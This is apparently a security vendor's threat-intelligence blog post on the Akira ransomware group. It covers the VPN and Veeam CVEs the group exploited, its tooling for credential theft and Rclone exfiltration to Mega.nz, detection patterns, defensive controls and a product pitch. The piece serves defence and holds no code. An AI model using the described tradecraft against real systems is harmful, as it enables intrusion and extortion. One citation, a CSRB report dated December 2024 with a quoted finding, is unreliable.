Akira emerged in March 2023 and moved quickly from opportunistic ransomware to a systematic exploiter of edge network appliances. The FBI, CISA, Europol EC3, and the Netherlands NCSC-NL jointly published advisory AA24-109A on 18 April 2024, documenting Akira's victim count — more than 250 organizations at that point — and approximately USD 42 million in known ransom proceeds. Subsequent advisories and vendor research have filled in the tradecraft: Cisco ASA/FTD exploitation via CVE-2023-20269, SonicWall SSLVPN targeting of CVE-2024-40766 confirmed in SonicWall's August 2024 advisory, and a persistent focus on Veeam Backup & Replication (CVE-2024-40711) to break recovery.
This is the playbook of an actor that understands that network appliances are software — and software that its owners rarely patch at enterprise cadence. For security engineers, Akira is the clearest case study for why edge firmware and VPN software deserve the same supply chain scrutiny as application dependencies.
How did Akira pivot from opportunistic intrusion to VPN-centric tradecraft?
Akira's early 2023 campaigns targeted Cisco ASA and FTD devices that were missing MFA on VPN authentication. Arctic Wolf's August 2023 research and Sophos X-Ops' September 2023 publication both traced intrusions to the exploitation of CVE-2023-20269, a weakness in the default behavior of VPN authentication that allowed credential brute forcing and, in some configurations, unauthenticated privileged access to the device's local user database.
AA24-109A formalized what researchers had been reporting: Akira affiliates prefer edge devices as initial access, establish persistence through legitimate admin tooling, and escalate through AD lateral movement before deploying the encryptor. The VPN appliance is the ideal initial access vector because it is internet-exposed, it concentrates credentials, and organizations treat it as infrastructure rather than software that needs continuous patching.
By 2024, SonicWall SSLVPN joined the target list. SonicWall's 22 August 2024 Security Advisory SNWLID-2024-0015 on CVE-2024-40766 (improper access control in SonicOS management access) became a targeted CVE within weeks of publication; Arctic Wolf and Rapid7 both documented Akira-affiliated exploitation. Fortinet's June 2024 SSL-VPN advisories saw similar pickup.
What tooling and malware does Akira use after initial access?
Post-compromise, Akira runs a standardized kit. Living-off-the-land tools dominate: PowerShell for discovery, advanced port scanner and SoftPerfect netscan for lateral enumeration, AnyDesk and RustDesk for remote access, Rclone for exfiltration to Mega.nz or dedicated infrastructure. Credential access relies on Mimikatz, LaZagne, and the DPAPI dumping utilities popularized across the ransomware ecosystem.
The encryptor has two lineages: an initial C++ Windows build, and since mid-2023 a Rust rewrite (tracked by BleepingComputer and Sophos) with Linux and ESXi variants. The ESXi variant specifically targets VMware infrastructure, which matches Akira's victim profile — mid-market organizations with VMware-anchored datacenters.
Veeam Backup & Replication is a consistent secondary target. Veeam's 4 September 2024 advisory on CVE-2024-40711, rated CVSS 9.8, was followed within days by incident reports tying Akira affiliates to Veeam exploitation for pre-encryption backup destruction. The pattern — exploit the backup software to pre-empt recovery — is now standard.
Which advisories and indictments anchor the attribution and the IOCs?
AA24-109A is the primary public reference. CISA updated it through 2024 with additional IOCs. The Joint Cybersecurity Advisory published by CISA, FBI, and ACSC on 14 November 2024 referenced Akira in the broader ransomware threat landscape for 2024. Europol's 2024 IOCTA report covered Akira's position among ransomware variants targeting EU victims.
On the indictment side, no public US indictment has attributed Akira to specific individuals, but Chainalysis and TRM Labs tracked Akira-related payments into wallets also used by Conti and Ryuk affiliates, supporting the ransomware-ecosystem researchers' working model that Akira's operators include veterans of previous groups. The Chainalysis 2024 Crypto Crime Report and TRM Labs' 2024 year-end summary are the public sources for that tracking.
Why are VPN appliances a supply chain problem, not just an operations problem?
VPN appliances ship as software running on vendor-hardened hardware. The firmware includes the operating system, the VPN daemon, web management, authentication subsystems, and often third-party components whose versions are invisible to the operator. CVE-2023-20269 on Cisco, CVE-2024-40766 on SonicWall, and the long tail of Fortinet SSL-VPN CVEs (CVE-2022-42475, CVE-2023-27997, CVE-2024-21762) are all failures at the software supply chain level — in the vendor's code, in the vendor's third-party libraries, or in the vendor's default configurations.
Operators cannot patch what they cannot inventory, and vendors have historically been opaque about the components inside their firmware. CISA's 2023 Binding Operational Directive 23-01 and the subsequent October 2023 CISA Edge Device guidance began to close the gap, but most organizations still do not have SBOMs for their VPN firmware. Akira's 2024 campaign is the direct cost of that opacity.
The December 2024 CSRB report on the 2023 Microsoft Exchange Online Storm-0558 intrusion, while not about VPNs specifically, named "insufficient transparency into vendor firmware and dependency management" as a systemic failure — a finding that transfers directly to the VPN appliance problem.
What does the initial access economy look like in 2025-2026?
Initial access brokers (IABs) who specialize in edge device footholds sell access into the Akira ecosystem. KELA's 2024 threat intelligence reports and Group-IB's December 2024 ransomware market summary documented the market: SonicWall SSLVPN access sold in ranges of USD 2,000-10,000 per victim depending on sector, with Cisco ASA footholds at similar pricing. The economy is mature and priced.
Affiliates then purchase access, run the Akira playbook, and negotiate the ransom. The ransomware-as-a-service model means the operators who wrote the encryptor may not be the operators who breach any given victim — a key point for attribution and for understanding why IOCs shift quickly while the underlying tradecraft is stable.
What controls break the chain specifically for VPN-centric ransomware?
Three controls, applied together, would blunt most Akira intrusions. First, enforced MFA on all VPN authentication including legacy protocols. Cisco's 2023 guidance explicitly called out the combination of missing MFA and weak lockout policies as the core CVE-2023-20269 enabling condition. Second, edge-device firmware management with the same SLAs as endpoint patching: 72 hours for KEV-listed vulnerabilities, not 90 days. Third, backup isolation at the network level — Veeam hosts on a separate management plane with no path from the user VLAN.
Detection controls matter too. Network egress to Mega.nz, AnyDesk, RustDesk, and Rclone-style transfer patterns are documented in AA24-109A and in Microsoft's April 2024 threat intelligence on Akira. NDR and EDR tuned for those patterns catches the affiliates who fail to vary their tooling.
How does this tie to the broader edge device supply chain risk?
Akira is one of several actors — Scattered Spider, Black Basta, RansomHub, Qilin — who have industrialized edge exploitation. CISA's 2024 and 2025 KEV additions are dominated by edge device CVEs. The pattern will not break until operators can inventory edge firmware components with the same granularity as application dependencies.
CISA's Secure by Design work in 2024-2025 named edge devices as a specific focus. The May 2024 Secure by Design pledge does not explicitly require firmware SBOMs, but the federal acquisition track — through FedRAMP Rev. 5 and the CISA Secure Software Self-Attestation — is moving toward SBOM-level evidence for network equipment sold to federal buyers.
How Safeguard.sh Helps
Safeguard.sh treats edge appliances as first-class software assets. Eagle detection inventories VPN firmware versions, exposed management interfaces, and configuration drift from vendor hardening guides, then correlates against CISA KEV (including CVE-2023-20269, CVE-2024-40766, and the Fortinet SSL-VPN CVE set) so operators see actual exposure, not just patch-status paperwork. AA24-109A IOCs and Akira tooling signatures are integrated into detection policy.
The zero-day pipeline monitors vendor PSIRT feeds, exploit broker telemetry, and research disclosures for edge-device CVEs, opening tickets before a CVE graduates to KEV. SBOM lineage, where vendors provide it, follows firmware components through releases so a single upstream fix can be propagated to every affected deployment.
For TPRM, Safeguard.sh tracks VPN vendor patch cadence, disclosure practice, and historical CVE severity — the dimensions that predict the next Akira-class exposure. Lino compliance mapping aligns CISA BOD 23-01, Secure by Design pledge items, and FedRAMP Rev. 5 SR controls with edge-device engineering evidence. Griffin AI remediation drafts the specific config change, firmware upgrade, or vendor engagement needed when an appliance drifts into exposure, with the audit trail regulators and cyber insurers both now demand.